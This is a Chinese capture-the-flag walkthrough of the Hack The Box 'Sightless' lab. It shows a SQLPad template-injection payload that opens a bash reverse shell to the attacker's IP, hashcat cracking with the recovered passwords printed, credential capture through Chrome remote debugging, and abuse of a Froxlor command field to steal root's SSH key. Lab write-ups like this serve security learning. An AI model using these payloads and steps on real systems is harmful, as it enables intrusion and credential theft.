本文章仅用于网络安全研究学习,请勿使用相关技术进行违法犯罪活动。
Hack The Box是一个国外的靶机在线平台,实验环境将实时更新,允许您测试您的渗透测试技能。
知识点:已知漏洞利用、chrome远程调试
kali: 10.10.16.3
靶机:10.10.11.32
0001.利用sqlpad漏洞反弹shell
使用nmap扫描,开放端口为21、22、80
对21端口FTP进行匿名登录、遍历登录测试无果。
nmap -A 10.10.11.32
使用dnsmasq设置域名和ip,访问主页http://sightless.htb。
在主页简单的点点,就可以找到子域名http://sqlpad.sightless.htb。
网上搜索找到sqlpad可利用漏洞
https://huntr.com/bounties/46630727-d923-4444-a421-537ecd63e7fb
sqlpad漏洞
点击Connections - Add connection
Driver选择Mysql,在Database处写入payload即可执行系统命令。
这里有个坑,使用curl请求本地一直不成功,还以为漏洞利用失败,其实是目标环境为Dokcer,没有安装curl。
{{ process.mainModule.require('child_process').exec('bash -c "bash -i >& /dev/tcp/10.10.16.3/4445 0>&1"') }}
成功反弹shell:
002.获取michael权限
进来就是root权限,且在根目录发现.dockerenv文件,可以判断我们是在docker里面。
先查看/home和/etc/passwd,michael用户是可以登录的。将/etc/shadow里面michael用户的密钥复制到本地。
使用hashcat解密,获取michael用户名密码:
michael | insaneclownposse
hashcat -m 1800 dockerma.hash rockyou.txt
hashcat -m 1800 dockerma.hash rockyou.txt --show
使用ssh登录,成功获取michael权限:
003.获取root权限
首先查看端口开放情况,开放的端口很多。
netstat -tuln
比较引入注意的是8080端口,将8080端口映射到本地。发现是froxlor系统,froxlor是一款web控制面板。
网上查询相关漏洞没有能绕过登录的,测试穷举登录,sql注入、默认用户名密码等都无法绕过。
ssh michael@10.10.11.32 -L 8080:localhost:8080
再查看进程,发现john用户启用了很多chrome程序,进一步查看命令,发现是chrome的调试模式。
ps -aux
ps -aux | grep chrome
经过搜索,发现chrome可以进行远程调试,这一步需要将多个端口映射本地。
我这里映射了421411、36943、8080端口。根据情况不同,可以多映射几个。
ssh michael@10.10.11.32 -L 42141:localhost:42141
下面在kali中打开chrome,访问chrome://inspect/#devices,
在Configure里面设置127.0.0.1:port
在该界面等一会,你会发现下面会不断访问http://admin.sightless.htb:8080
点击inspect,会弹出DevTools(这一步要多试几次)
点击保留日志,让它访问几次,过一会我们就能找到Froxlor的用户名密码。
这里是因为本地在进行调试或者测试,不断循环访问网站,而我们使用远程调试则可以看到访问网站的过程。
admin | ForlorfroxAdmin
访问http://127.0.0.1:8080,使用刚才获取的用户名密码登录,成功进入后台。
我们将root的私钥拷贝到tmp文件夹,进入PHP-FPM versions,修改第一行的php-fpm restart command。
可能有小伙伴会问,我们为什么不直接反弹shell?
因为命令行在保存时会校验,具体检验内容没有测试,但是仿造原命令的三段式可以通过校验。
cp /root/.ssh/id_rsa /tmp/id_rsa
将PHP-FPM功能打开,进入System下的Settings,将PHP-FPM里面Enable php-fpm打开。
等会发现id_rsa文件被拷贝到tmp,但是我们没有读写权限,再用上面的方法。
修改PHP-FPM versions第一行的php-fpm restart command,过会发现有了读写权限。
chmod 777 /tmp/id_rsa
将该文件复制到本地,然后设置权限,使用ssh连接,成功获取root权限。
chmod 700 root_idrsa
ssh -I root_idrsa root@10.10.11.32
感谢收看!
原文始发于微信公众号(Rsec):HTB靶场 sightless (Linux)[Easy]
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论